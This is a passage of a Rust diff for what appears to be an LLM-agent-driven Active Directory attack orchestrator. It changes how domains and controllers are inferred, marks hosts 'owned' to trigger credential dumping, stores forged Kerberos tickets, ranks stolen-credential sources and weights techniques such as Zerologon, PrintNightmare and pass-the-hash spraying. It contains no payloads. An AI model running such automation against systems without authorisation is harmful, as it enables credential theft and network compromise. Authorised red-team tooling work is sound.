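Both halves of the replacement logic here, the suffix split and the single-domain fallback, are small enough to restate as pure functions. Illustrative sketches under the same rules the surrounding code applies:

```rust
/// Drop the leftmost label; require at least 3 labels so a 2-label name like
/// "dc01.local" never yields "local" as the AD domain.
fn derive_domain(fqdn: &str) -> Option<String> {
    let parts: Vec<&str> = fqdn.trim_end_matches('.').split('.').collect();
    (parts.len() >= 3).then(|| parts[1..].join(".").to_lowercase())
}

/// The fallback is only unambiguous with exactly one known domain; zero or
/// several means skip registration rather than guess.
fn fallback_domain(known: &[String]) -> Option<&str> {
    match known {
        [only] => Some(only.as_str()),
        _ => None,
    }
}

// derive_domain("dc02.child.contoso.local") == Some("child.contoso.local".into())
// derive_domain("dc01.local") == None
```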
- let raw_domain = if raw_domain.is_empty() - || raw_domain.contains("compute.internal") - || raw_domain.contains("amazonaws.com") - { + // The DC's own FQDN is a self-report — strongest evidence we have + // short of a CLDAP probe. Push it through `publish_candidate_domain` + // so cloud / default-OS shapes are filtered consistently with other + // discovery paths. + let mut domain = String::new(); + if !derived.is_empty() { + let outcome = self + .publish_candidate_domain( + queue, + derived.clone(), + DomainEvidence::DcSelfReport, + Some(host.ip.clone()), + ) + .await?; + if matches!(outcome, super::DomainPublishOutcome::Promoted) { + domain = derived; + } + } + + // If the FQDN was unusable (missing, rejected, or short), fall back to + // the sole known authoritative domain. With ≥2 domains, "first" is a + // guess that mis-maps DCs to the wrong domain — that bad mapping + // survives later cleanup since `register_dc` only purges stale entries + // by IP, so a subsequent correct registration with a *different* IP + // can't dislodge the wrong (domain, ip) pair. Skip and let the next + // FQDN-bearing discovery populate the entry. + if domain.is_empty() { let state = self.inner.read().await; - if let Some(fallback) = state.domains.first().cloned() { + if state.domains.len() == 1 { + let fallback = state.domains[0].clone(); tracing::info!( ip = %host.ip, hostname = %host.hostname, fallback_domain = %fallback, - "DC registration: using fallback domain (no FQDN available)" + "DC registration: using fallback domain (no usable FQDN)" ); - fallback + domain = fallback; } else { tracing::debug!( ip = %host.ip, hostname = %host.hostname, - "Skipping DC registration: no FQDN and no fallback domain in state" + known_domains = state.domains.len(), + "Skipping DC registration: no usable FQDN and ambiguous fallback domain" ); return Ok(()); } - } else { - raw_domain - }; + } - let domain = raw_domain; let domain_lower = domain.to_lowercase(); let mut conn = queue.connection(); @@ -318,31 +343,18 @@ impl SharedState { ); let _: () = conn.hdel(&dc_key, stale).await?; } - // Remove stale entries from state (done below under write lock) } let _: () = conn.hset(&dc_key, &domain_lower, &host.ip).await?; - // Add domain to state and Redis, correct stale mappings let mut state = self.inner.write().await; - - // Remove stale domain → IP mappings for this IP state .domain_controllers .retain(|d, ip| !(ip == &host.ip && *d != domain_lower)); - - // Insert or update the mapping state .domain_controllers .insert(domain_lower.clone(), host.ip.clone()); - if !state.domains.contains(&domain_lower) { - state.domains.push(domain_lower.clone()); - let domain_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS); - let _: () = conn.sadd(&domain_key, &domain_lower).await?; - let _: () = conn.expire(&domain_key, 86400).await?; - } - tracing::info!( ip = %host.ip, domain = %domain_lower, @@ -351,6 +363,74 @@ impl SharedState { Ok(()) } + + /// Mark a host as owned (admin access confirmed). + /// + /// This persists the owned flag to both in-memory state and Redis so + /// that automations like `auto_lsassy_dump` and `credential_expansion` + /// can react to host ownership changes. 
+ pub async fn mark_host_owned( + &self, + queue: &TaskQueueCore, + ip: &str, + ) -> Result<()> { + let (host_json, op_id) = { + let mut state = self.inner.write().await; + let host = state.hosts.iter_mut().find(|h| h.ip == ip); + if let Some(h) = host { + if h.owned { + return Ok(()); // already owned + } + h.owned = true; + tracing::info!(ip = %ip, hostname = %h.hostname, "Host marked as owned"); + let json = serde_json::to_string(h).unwrap_or_default(); + (json, state.operation_id.clone()) + } else { + // Host not yet in state — create a minimal entry so downstream + // automations (lsassy_dump, credential_expansion) can fire. + // This happens when secretsdump succeeds before host discovery. + let new_host = Host { + ip: ip.to_string(), + hostname: ip.to_string(), // will be enriched by later discovery + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: state.domain_controllers.values().any(|dc| dc == ip), + owned: true, + }; + tracing::info!(ip = %ip, "Host not in state — creating owned entry"); + let json = serde_json::to_string(&new_host).unwrap_or_default(); + let op_id = state.operation_id.clone(); + state.hosts.push(new_host); + (json, op_id) + } + }; + + // Persist to Redis + let host_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HOSTS); + let mut conn = queue.connection(); + let entries: Vec<String> = redis::AsyncCommands::lrange(&mut conn, &host_key, 0, -1) + .await + .unwrap_or_default(); + let mut found = false; + for (idx, entry) in entries.iter().enumerate() { + if let Ok(existing) = serde_json::from_str::<Host>(entry) { + if existing.ip == ip { + let _: Result<(), _> = + redis::AsyncCommands::lset(&mut conn, &host_key, idx as isize, &host_json) + .await; + found = true; + break; + } + } + } + if !found { + // New host entry — append to Redis list + let _: Result<(), _> = + redis::AsyncCommands::rpush(&mut conn, &host_key, &host_json).await; + } + Ok(()) + } +} #[cfg(test)] @@ -392,13 +472,57 @@ mod tests { } #[tokio::test] - async fn publish_host_extracts_domain_from_fqdn() { + async fn publish_host_holds_inferred_domain_as_candidate() { + // A non-DC host's FQDN suffix is weak evidence — the suffix should + // land in candidate_domains, NOT state.domains, until corroborated. let state = SharedState::new("op-1".to_string()); let q = mock_queue(); let host = make_host("192.168.58.5", "srv01.contoso.local", false); state.publish_host(&q, host).await.unwrap(); + let s = state.inner.read().await; + assert!( + !s.domains.contains(&"contoso.local".to_string()), + "non-DC FQDN must not auto-promote into state.domains" + ); + assert!( + s.candidate_domains.contains_key("contoso.local"), + "non-DC FQDN should be recorded as a candidate" + ); + } + + #[tokio::test] + async fn publish_host_promotes_inferred_domain_when_matches_target() { + // If the operation's target.domain matches the inferred suffix, it's + // corroborated and promotes immediately.
+ let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.target = Some(ares_core::models::Target { + ip: "192.168.58.10".into(), + hostname: String::new(), + domain: "contoso.local".into(), + environment: String::new(), + }); + } + let host = make_host("192.168.58.5", "srv01.contoso.local", false); + state.publish_host(&q, host).await.unwrap(); + + let s = state.inner.read().await; + assert!(s.domains.contains(&"contoso.local".to_string())); + } + + #[tokio::test] + async fn publish_host_promotes_dc_self_report() { + // A DC's own FQDN is a self-report — auto-promotes without corroboration. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let host = make_host("192.168.58.1", "dc01.contoso.local", true); + state.publish_host(&q, host).await.unwrap(); + let s = state.inner.read().await; assert!(s.domains.contains(&"contoso.local".to_string())); } @@ -608,6 +732,31 @@ mod tests { ); } + #[tokio::test] + async fn register_dc_skips_ambiguous_fallback_with_multiple_domains() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + // Two domains in state — fallback would be a guess. + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + s.domains.push("fabrikam.local".to_string()); + } + + // DC discovered with no FQDN — must NOT pick the first domain, + // because that would mis-map (e.g. parent DC under child domain) + // and the bad mapping survives later cleanup. + let host = make_host("192.168.58.1", "", true); + state.register_dc(&q, &host).await.unwrap(); + + let s = state.inner.read().await; + assert!( + s.domain_controllers.is_empty(), + "must skip registration when fallback domain is ambiguous" + ); + } + #[tokio::test] async fn register_dc_three_part_hostname_extracts_full_domain() { // Sanity check the >=3 parts branch with a deeper FQDN to make sure @@ -625,6 +774,46 @@ mod tests { ); } + #[tokio::test] + async fn publish_host_upgrades_short_hostname_to_fqdn_and_reregisters_dc() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + // Pre-populate two domains so the ambiguous fallback would fire + // if FQDN derivation didn't work. + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + s.domains.push("fabrikam.local".to_string()); + } + + // First sighting: short name only — register_dc must skip (ambiguous). + let h1 = make_host("192.168.58.1", "dc01", true); + state.publish_host(&q, h1).await.unwrap(); + { + let s = state.inner.read().await; + assert!(s.domain_controllers.is_empty()); + assert_eq!(s.hosts[0].hostname, "dc01"); + } + + // Second sighting: FQDN. Must upgrade hostname AND trigger + // re-registration so the DC lands under the correct domain. 
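The upgrade condition this test exercises is the `starts_with` check added in `publish_host`; restated standalone:

```rust
/// A new FQDN may replace an existing short name only when its first label
/// is that short name (case-insensitive): "dc01" upgrades to
/// "dc01.fabrikam.local" but is never clobbered by "srv02.contoso.local".
fn should_upgrade_to_fqdn(existing: &str, incoming: &str) -> bool {
    incoming.contains('.')
        && !existing.contains('.')
        && incoming
            .to_lowercase()
            .starts_with(&format!("{}.", existing.to_lowercase()))
}
```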
+ let h2 = make_host("192.168.58.1", "dc01.fabrikam.local", true); + state.publish_host(&q, h2).await.unwrap(); + + let s = state.inner.read().await; + assert_eq!(s.hosts[0].hostname, "dc01.fabrikam.local"); + assert_eq!( + s.domain_controllers.get("fabrikam.local"), + Some(&"192.168.58.1".to_string()), + "DC must register under the domain derived from the upgraded FQDN" + ); + assert!( + !s.domain_controllers.contains_key("contoso.local"), + "must not also register under the wrong (first) domain" + ); + } + #[tokio::test] async fn publish_host_strips_trailing_dot() { let state = SharedState::new("op-1".to_string()); @@ -637,6 +826,100 @@ mod tests { assert_eq!(s.hosts[0].hostname, "srv01.contoso.local"); } + #[tokio::test] + async fn publish_host_rejects_default_windows_hostname_as_domain() { + // Regression: a non-domain-joined Windows host with the default + // `WIN-XXXX` hostname must NOT have its FQDN auto-extracted as a + // bogus AD domain (e.g. `win-hvtt4f8yn5n.ttb0.local`). + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let host = make_host( + "192.168.58.178", + "win-hvtt4f8yn5n.win-hvtt4f8yn5n.ttb0.local", + false, + ); + state.publish_host(&q, host).await.unwrap(); + + let s = state.inner.read().await; + assert!( + !s.domains.iter().any(|d| d.contains("win-")), + "default Windows hostname leaked into state.domains: {:?}", + s.domains + ); + assert!( + !s.candidate_domains + .keys() + .any(|d| d.contains("win-") || d.contains("ttb0.local")), + "default Windows hostname leaked into candidate_domains: {:?}", + s.candidate_domains + ); + } + + #[tokio::test] + async fn publish_host_rejects_desktop_oobe_hostname() { + // Win10/11 OOBE default `DESKTOP-XXXXXXX` should be filtered too — + // generalizes the cross-OS pre-filter beyond `WIN-` server names. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let host = make_host("192.168.58.179", "desktop-abc1234.workgroup.local", false); + state.publish_host(&q, host).await.unwrap(); + + let s = state.inner.read().await; + assert!(s.domains.is_empty()); + assert!( + s.candidate_domains.is_empty(), + "desktop-* hostname leaked: {:?}", + s.candidate_domains + ); + } + + #[tokio::test] + async fn register_dc_rejects_default_windows_hostname_no_fallback() { + // Even if a host is mis-detected as a DC, a default-Windows FQDN + // must not be accepted as the AD domain. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let host = make_host("192.168.58.178", "win-hvtt4f8yn5n.ttb0.local", true); + state.register_dc(&q, &host).await.unwrap(); + + let s = state.inner.read().await; + assert!( + s.domain_controllers.is_empty(), + "default Windows FQDN must not register as a DC domain" + ); + assert!( + !s.domains.iter().any(|d| d.contains("win-")), + "default Windows FQDN leaked into state.domains: {:?}", + s.domains + ); + } + + #[tokio::test] + async fn register_dc_default_windows_hostname_falls_back_to_known_domain() { + // If exactly one real domain is known, a DC discovered with a + // default-Windows FQDN should fall back to the real domain. 
+ let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + } + + let host = make_host("192.168.58.1", "win-hvtt4f8yn5n.ttb0.local", true); + state.register_dc(&q, &host).await.unwrap(); + + let s = state.inner.read().await; + assert_eq!( + s.domain_controllers.get("contoso.local"), + Some(&"192.168.58.1".to_string()), + "expected fallback to the single known real domain" + ); + assert!(!s.domain_controllers.contains_key("ttb0.local")); + } + #[tokio::test] async fn publish_host_merges_os() { let state = SharedState::new("op-1".to_string()); diff --git a/ares-cli/src/orchestrator/state/publishing/kerberos.rs b/ares-cli/src/orchestrator/state/publishing/kerberos.rs new file mode 100644 index 00000000..6bceff72 --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/kerberos.rs @@ -0,0 +1,63 @@ +//! Kerberos ticket publishing — store forged inter-realm ccache records in state +//! and Redis so downstream tools can find them when NTLM bind fails. + +use anyhow::Result; + +use ares_core::models::KerberosTicket; +use ares_core::state::RedisStateReader; + +use redis::aio::ConnectionLike; + +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueueCore; + +impl SharedState { + /// Store a forged Kerberos ticket in in-memory state and Redis. + /// + /// Uses `HSET` (not `HSETNX`) so a freshly-forged ticket always replaces a + /// stale ccache path for the same `(source, target, username)` triple. + pub async fn publish_kerberos_ticket( + &self, + queue: &TaskQueueCore, + ticket: KerberosTicket, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + reader.add_kerberos_ticket(&mut conn, &ticket).await?; + { + let mut state = self.inner.write().await; + // Replace any existing entry for the same (source, target, username). + let key = ticket.dedup_key(); + state.kerberos_tickets.retain(|t| t.dedup_key() != key); + state.kerberos_tickets.push(ticket); + } + Ok(()) + } + + /// Find a Kerberos ticket for a specific (source_domain, target_domain, username) triple. + #[allow(dead_code)] + pub async fn find_kerberos_ticket( + &self, + source_domain: &str, + target_domain: &str, + username: &str, + ) -> Option { + let state = self.inner.read().await; + let src_l = source_domain.to_lowercase(); + let tgt_l = target_domain.to_lowercase(); + let user_l = username.to_lowercase(); + state + .kerberos_tickets + .iter() + .find(|t| { + t.source_domain.to_lowercase() == src_l + && t.target_domain.to_lowercase() == tgt_l + && t.username.to_lowercase() == user_l + }) + .cloned() + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/mod.rs b/ares-cli/src/orchestrator/state/publishing/mod.rs index 6cba8604..935c1fc3 100644 --- a/ares-cli/src/orchestrator/state/publishing/mod.rs +++ b/ares-cli/src/orchestrator/state/publishing/mod.rs @@ -2,10 +2,14 @@ //! to both in-memory state and Redis. mod credentials; +mod domains; mod entities; mod hosts; +mod kerberos; mod milestones; +pub use domains::DomainPublishOutcome; + use regex::Regex; use std::sync::LazyLock; @@ -13,6 +17,33 @@ use std::sync::LazyLock; pub(super) static PASSWORD_PREFIX_RE: LazyLock = LazyLock::new(|| Regex::new(r"(?i)^password\s*:\s*").unwrap()); +/// Trust ranking for a credential source. 
+/// +/// Used by `publish_credential` to decide whether a new (user, password) +/// pair claiming a different realm than an existing entry should be treated +/// as authoritative or as a phantom. Higher value = more trusted. +/// +/// - **High (3)**: deterministic, host-bound dumps where the realm is +/// pinned by the source DC's NTDS / LSA storage. +/// - **Medium (2)**: realm validated by an actual authentication round-trip +/// or by a cracking pipeline whose input was already realm-pinned. +/// - **Low (1)**: heuristic / format-fragile sources where the realm is +/// inferred from surrounding tool output and can bleed across forests +/// (description fields, registry autologon, SYSVOL scripts). +/// - **Unknown (0)**: anything not classified — treated as least trusted. +pub(super) fn credential_source_trust(source: &str) -> u8 { + match source { + "secretsdump" | "lsa_secrets" | "dpapi" | "kerberos_extracted" | "initial" => 3, + "netexec_auth" | "cracked:hashcat" | "cracked:john" | "cracked" => 2, + "description_field" + | "autologon_registry" + | "sysvol_script" + | "user_description_leak" + | "netexec_password" => 1, + _ => 0, + } +} + /// Regex matching trailing parenthetical metadata like ` (Guest)`, ` (Pwn3d!)`. pub(super) static TRAILING_PAREN_RE: LazyLock = LazyLock::new(|| Regex::new(r"\s+\([^)]+\)\s*$").unwrap()); @@ -102,6 +133,12 @@ pub(super) fn sanitize_credential( } } + // Canonicalize realm casing. AD realms are case-insensitive; storing them + // mixed-case (`CONTOSO.LOCAL` from one tool, `contoso.local` from another) + // splits the same identity into two state entries and slips past dedup + // keys built with `format!("{domain}\\{user}:{pass}")`. + cred.domain = cred.domain.to_lowercase(); + // Validate after sanitization if !crate::orchestrator::output_extraction::is_valid_credential(&cred.username, &cred.password) { @@ -111,10 +148,103 @@ pub(super) fn sanitize_credential( Some(cred) } -/// Check if a hostname is an AWS internal PTR name. -pub(super) fn is_aws_hostname(hostname: &str) -> bool { - let lower = hostname.to_lowercase(); - lower.starts_with("ip-") && lower.contains("compute.internal") +/// Strip the trailing "0." artifact that NetExec sometimes appends to domain +/// names (e.g. `dc01.contoso.local0.` → `dc01.contoso.local`, +/// `contoso.local0` → `contoso.local`). +pub(super) fn strip_netexec_artifact(s: &str) -> &str { + let s = s.trim_end_matches('.'); + // "0." already collapsed to "0" after trimming "."; strip if preceded by a label + match s.strip_suffix("0.") { + Some(clean) => clean.trim_end_matches('.'), + None => match s.strip_suffix('0') { + // Avoid stripping a real trailing 0 from e.g. "host10" — + // only strip if the char before the 0 is alphabetic (TLD-like). + Some(clean) if clean.ends_with(|c: char| c.is_ascii_alphabetic()) => clean, + _ => s, + }, + } +} + +/// Check if a label matches a known default-OS auto-generated hostname +/// (Windows OOBE, Win10/11 OOBE, AWS EC2 default). These appear on hosts +/// that haven't been renamed or domain-joined; they are never valid AD +/// domain labels. 
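A tiny illustration of the failure mode named above, assuming the `{domain}\{user}:{pass}` key shape mentioned in the sanitizer comment:

```rust
// Illustrative only; shows why the realm must be lowercased before keying.
fn cred_dedup_key(domain: &str, user: &str, pass: &str) -> String {
    format!("{}\\{}:{}", domain.to_lowercase(), user, pass)
}

// Without to_lowercase(), "CONTOSO.LOCAL\alice:pw" and "contoso.local\alice:pw"
// are distinct keys and one identity is stored twice; with it, both collapse
// to a single entry.
```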
+/// +/// Matches: +/// - `WIN-XXXXXXXX` (Win Server / older Win, 8–15 alphanumeric tail) +/// - `DESKTOP-XXXXXXX` / `LAPTOP-XXXXXXX` (Win10/11 OOBE, exactly 7 alphanumerics) +/// - `ip-A-B-C-D` (AWS EC2 default) +pub(super) fn is_default_os_label(label: &str) -> bool { + let lower = label.to_lowercase(); + if let Some(suffix) = lower.strip_prefix("win-") { + let len = suffix.len(); + return (8..=15).contains(&len) && suffix.chars().all(|c| c.is_ascii_alphanumeric()); + } + if let Some(suffix) = lower + .strip_prefix("desktop-") + .or_else(|| lower.strip_prefix("laptop-")) + { + return suffix.len() == 7 && suffix.chars().all(|c| c.is_ascii_alphanumeric()); + } + if let Some(rest) = lower.strip_prefix("ip-") { + let octets: Vec<&str> = rest.split('-').collect(); + if octets.len() == 4 + && octets + .iter() + .all(|o| !o.is_empty() && o.chars().all(|c| c.is_ascii_digit())) + { + return true; + } + } + false +} + +/// Single predicate for "this multi-label DNS name could plausibly be a real +/// AD-style FQDN." Used both as a pre-filter on candidate domains +/// (`publish_candidate_domain`) and as a hostname-normalization gate on +/// `Host.hostname` (`publish_host`, `register_dc`) — every cloud / mDNS / +/// default-OS / bare-TLD rejection lives here so call sites don't have to +/// know the rules. +/// +/// Rejects shapes that are *never* AD domains across OS families: +/// - Empty / whitespace, or single-label (`local`, `workgroup`) +/// - Pure mDNS link-local TLDs (`localhost`, `localdomain`) +/// - Cloud / hypervisor internal suffixes (AWS `compute.internal`, +/// `amazonaws.com`; Azure `internal.cloudapp.net`; GCP `c..internal`) +/// - Any label (in any position) matching a known default-OS auto-name +/// (`WIN-XXXX`, `DESKTOP-XXXX`, `LAPTOP-XXXX`, `ip-A-B-C-D`) — an unrenamed +/// host can't be trusted as a source of AD domain truth even if its suffix +/// looks plausible. +pub(super) fn looks_like_real_domain(name: &str) -> bool { + let trimmed = name.trim().trim_end_matches('.').to_lowercase(); + if trimmed.is_empty() { + return false; + } + let labels: Vec<&str> = trimmed.split('.').collect(); + if labels.len() < 2 { + return false; + } + if matches!(trimmed.as_str(), "localhost" | "localdomain") { + return false; + } + if labels + .last() + .map(|l| matches!(*l, "localhost" | "localdomain")) + .unwrap_or(false) + { + return false; + } + if trimmed.contains("compute.internal") + || trimmed.ends_with(".amazonaws.com") + || trimmed.ends_with(".internal.cloudapp.net") + || (trimmed.starts_with("c.") && trimmed.ends_with(".internal")) + { + return false; + } + if labels.iter().any(|l| is_default_os_label(l)) { + return false; + } + true } #[cfg(test)] @@ -137,6 +267,8 @@ mod tests { } } + // --- sanitize_credential --- + #[test] fn valid_credential_passes_through() { let cred = make_cred("alice", "P@ssw0rd!", "contoso.local"); @@ -223,6 +355,17 @@ mod tests { assert_eq!(result.domain, "child.contoso.local"); } + #[test] + fn realm_case_canonicalized_to_lowercase() { + // Tools surface realm in mixed/upper case (`CONTOSO.LOCAL` from + // rpcclient, `Contoso.Local` from LDAP). Without canonicalization, the + // same identity ends up split across multiple state entries and + // realm-strict credential lookups miss matches. 
+ let cred = make_cred("alice", "P@ssw0rd!", "CONTOSO.LOCAL"); + let result = sanitize_credential(cred, &HashMap::new()).unwrap(); + assert_eq!(result.domain, "contoso.local"); + } + #[test] fn netbios_domain_resolved_to_fqdn() { let mut map = HashMap::new(); @@ -269,23 +412,127 @@ mod tests { assert!(sanitize_credential(cred, &HashMap::new()).is_none()); } + // --- is_default_os_label --- + #[test] - fn aws_hostname_detected() { - assert!(is_aws_hostname("ip-10-0-0-1.ec2.compute.internal")); + fn default_os_label_detects_windows_oobe() { + assert!(is_default_os_label("WIN-HVTT4F8YN5N")); + assert!(is_default_os_label("win-hvtt4f8yn5n")); + assert!(is_default_os_label("WIN-ABCDEFGH")); } #[test] - fn aws_hostname_case_insensitive() { - assert!(is_aws_hostname("IP-10-0-0-1.EC2.COMPUTE.INTERNAL")); + fn default_os_label_detects_win10_11_oobe() { + assert!(is_default_os_label("DESKTOP-ABC1234")); + assert!(is_default_os_label("desktop-abc1234")); + assert!(is_default_os_label("LAPTOP-XYZ7890")); + // Wrong tail length (Win10/11 OOBE is exactly 7). + assert!(!is_default_os_label("DESKTOP-ABCDEFGH")); + assert!(!is_default_os_label("DESKTOP-ABC")); } #[test] - fn non_aws_hostname_rejected() { - assert!(!is_aws_hostname("webserver01.contoso.local")); + fn default_os_label_detects_aws_default() { + assert!(is_default_os_label("ip-10-0-1-50")); + assert!(is_default_os_label("ip-192-168-1-1")); + // Not 4 octets: + assert!(!is_default_os_label("ip-10-0-1")); + // Non-numeric: + assert!(!is_default_os_label("ip-foo-bar-baz-qux")); } #[test] - fn ip_prefix_without_compute_internal_rejected() { - assert!(!is_aws_hostname("ip-missing-suffix.local")); + fn default_os_label_rejects_legitimate_names() { + assert!(!is_default_os_label("dc01")); + assert!(!is_default_os_label("contoso")); + assert!(!is_default_os_label("local")); + // Too short + assert!(!is_default_os_label("WIN-ABC")); + // Too long + assert!(!is_default_os_label("WIN-ABCDEFGHIJKLMNOP")); + // Wrong prefix + assert!(!is_default_os_label("LIN-ABCDEFGH")); + // Contains non-alphanumerics + assert!(!is_default_os_label("WIN-HVTT4F8.YN5N")); + } + + #[test] + fn looks_like_real_domain_accepts_typical_ad() { + assert!(looks_like_real_domain("contoso.local")); + assert!(looks_like_real_domain("child.contoso.local")); + assert!(looks_like_real_domain("eu.contoso.local")); + assert!(looks_like_real_domain("contoso.com")); + } + + #[test] + fn looks_like_real_domain_rejects_bare_tld_and_mdns() { + assert!(!looks_like_real_domain("local")); + assert!(!looks_like_real_domain("")); + assert!(!looks_like_real_domain("localhost")); + assert!(!looks_like_real_domain("foo.localhost")); + assert!(!looks_like_real_domain("foo.localdomain")); + } + + #[test] + fn looks_like_real_domain_rejects_cloud_internals() { + assert!(!looks_like_real_domain("us-west-2.compute.internal")); + assert!(!looks_like_real_domain("eu-west-1.amazonaws.com")); + assert!(!looks_like_real_domain("vm123.internal.cloudapp.net")); + assert!(!looks_like_real_domain("c.myproject.internal")); + } + + #[test] + fn looks_like_real_domain_rejects_default_os_labels_anywhere() { + assert!(!looks_like_real_domain("win-hvtt4f8yn5n.ttb0.local")); + assert!(!looks_like_real_domain("desktop-abc1234.workgroup.local")); + assert!(!looks_like_real_domain("ip-10-0-0-1.something.com")); + assert!(!looks_like_real_domain("dc01.win-abc12345.contoso.local")); + assert!(!looks_like_real_domain( + "ip-10-0-0-1.us-west-2.compute.internal" + )); + } + + // --- strip_netexec_artifact --- + + #[test] + fn 
strip_netexec_zero_dot() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local0."), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_zero_no_dot() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local0"), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_preserves_clean_hostname() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local"), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_preserves_numeric_suffix() { + // Must NOT strip the 0 from "host10" or "dc10" + assert_eq!(strip_netexec_artifact("host10"), "host10"); + assert_eq!( + strip_netexec_artifact("dc10.contoso.local"), + "dc10.contoso.local" + ); + } + + #[test] + fn strip_netexec_child_domain() { + assert_eq!( + strip_netexec_artifact("dc02.child.contoso.local0."), + "dc02.child.contoso.local" + ); } } diff --git a/ares-cli/src/orchestrator/state/shared.rs b/ares-cli/src/orchestrator/state/shared.rs index ea805d49..03f91cf2 100644 --- a/ares-cli/src/orchestrator/state/shared.rs +++ b/ares-cli/src/orchestrator/state/shared.rs @@ -34,9 +34,29 @@ impl SharedState { &s.domain_controllers, ); + // Hide quarantined credentials from LLM agents. A locked-out + // account can't authenticate during the quarantine window, and + // surfacing it just invites more failed-auth attempts on the same + // account (which keep the badPwdCount climbing on shared lockout + // policies). The state's own resolvers already filter + // is_credential_quarantined for automation paths; this filter does + // the same for the LLM-facing snapshot. + let credentials: Vec<_> = s + .credentials + .iter() + .filter(|c| !s.is_credential_quarantined(&c.username, &c.domain)) + .cloned() + .collect(); + let hashes: Vec<_> = s + .hashes + .iter() + .filter(|h| !s.is_credential_quarantined(&h.username, &h.domain)) + .cloned() + .collect(); + ares_llm::prompt::StateSnapshot { - credentials: s.credentials.clone(), - hashes: s.hashes.clone(), + credentials, + hashes, hosts: s.hosts.clone(), shares: s.shares.clone(), domains: s.domains.clone(), @@ -203,6 +223,69 @@ mod tests { assert!(key.starts_with("ares:discoveries:")); } + #[tokio::test] + async fn snapshot_hides_quarantined_credentials() { + let state = SharedState::new("op-1".into()); + { + let mut inner = state.write().await; + inner.credentials.push(Credential { + id: "c1".into(), + username: "live_user".into(), + password: "p1".into(), + domain: "contoso.local".into(), + source: "test".into(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }); + inner.credentials.push(Credential { + id: "c2".into(), + username: "locked_user".into(), + password: "p2".into(), + domain: "contoso.local".into(), + source: "test".into(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }); + inner.hashes.push(Hash { + id: "h1".into(), + username: "locked_user".into(), + hash_type: "NTLM".into(), + hash_value: "aabbcc".into(), + domain: "contoso.local".into(), + source: "test".into(), + cracked_password: None, + aes_key: None, + discovered_at: Some(chrono::Utc::now()), + parent_id: None, + attack_step: 0, + }); + inner.hashes.push(Hash { + id: "h2".into(), + username: "live_user".into(), + hash_type: "NTLM".into(), + hash_value: "ddeeff".into(), + domain: "contoso.local".into(), + source: "test".into(), + cracked_password: None, + aes_key: None, + discovered_at: Some(chrono::Utc::now()), + parent_id: None, + attack_step: 0, + }); + inner.quarantine_credential("locked_user", "contoso.local"); + } + + let snap = 
state.snapshot().await; + assert_eq!(snap.credentials.len(), 1, "quarantined cred must be hidden"); + assert_eq!(snap.credentials[0].username, "live_user"); + assert_eq!(snap.hashes.len(), 1, "quarantined hash must be hidden"); + assert_eq!(snap.hashes[0].username, "live_user"); + } + #[tokio::test] async fn snapshot_with_vulnerabilities() { let state = SharedState::new("op-1".into()); diff --git a/ares-cli/src/orchestrator/strategy.rs b/ares-cli/src/orchestrator/strategy.rs index 22fb9f6f..347d795f 100644 --- a/ares-cli/src/orchestrator/strategy.rs +++ b/ares-cli/src/orchestrator/strategy.rs @@ -292,45 +292,126 @@ fn fast_weights() -> HashMap { ("adcs_esc8", 5), ("gpo_abuse", 6), ("laps", 4), + ("ntlm_relay", 5), + ("nopac", 4), + ("zerologon", 3), + ("printnightmare", 6), + ("share_coercion", 5), + ("mssql_coercion", 4), + ("password_policy", 3), + ("gpp_sysvol", 3), + ("ntlmv1_downgrade", 3), + ("ldap_signing", 3), + ("webdav_detection", 4), + ("spooler_check", 3), + ("machine_account_quota", 3), + ("dfs_coercion", 5), + ("petitpotam_unauth", 4), + ("winrm_lateral", 5), + ("group_enumeration", 2), + ("localuser_spray", 4), + ("krbrelayup", 5), + ("searchconnector_coercion", 5), + ("lsassy_dump", 3), + ("rdp_lateral", 5), + ("foreign_group_enum", 3), + ("certipy_auth", 2), + ("sid_enumeration", 3), + ("dns_enum", 3), + ("domain_user_enumeration", 2), + ("pth_spray", 4), + ("certifried", 4), + ("dacl_abuse", 2), + ("smbclient_enum", 4), + ("cross_forest_enum", 3), + ("acl_discovery", 2), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) .collect() } -/// Comprehensive: flat priorities so all techniques get equal attention. +/// Comprehensive: prioritize exploitation breadth over speed-to-DA. +/// +/// With flat priorities (old design), the deferred queue drained FIFO, meaning +/// the credential pipeline (AS-REP → Kerberoast → secretsdump) always won +/// because its conditions were met first. ADCS, delegation, NTLM relay, and +/// other exploitation techniques never got slots before DA terminated the op. +/// +/// This design uses 3 tiers: +/// 1 = high-value exploitation (ADCS, delegation, NTLM relay, ACL abuse) +/// 2 = credential pipeline + lateral movement +/// 3 = recon, enumeration, low-value checks +/// +/// The goal: exploit *everything* discovered, not just the fastest path to DA. 
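The tier numbers only matter through the drain order they induce. A minimal sketch, assuming the deferred queue pops entries by ascending weight (tie-breaking by name here is incidental to the illustration):

```rust
use std::cmp::Reverse;
use std::collections::BinaryHeap;

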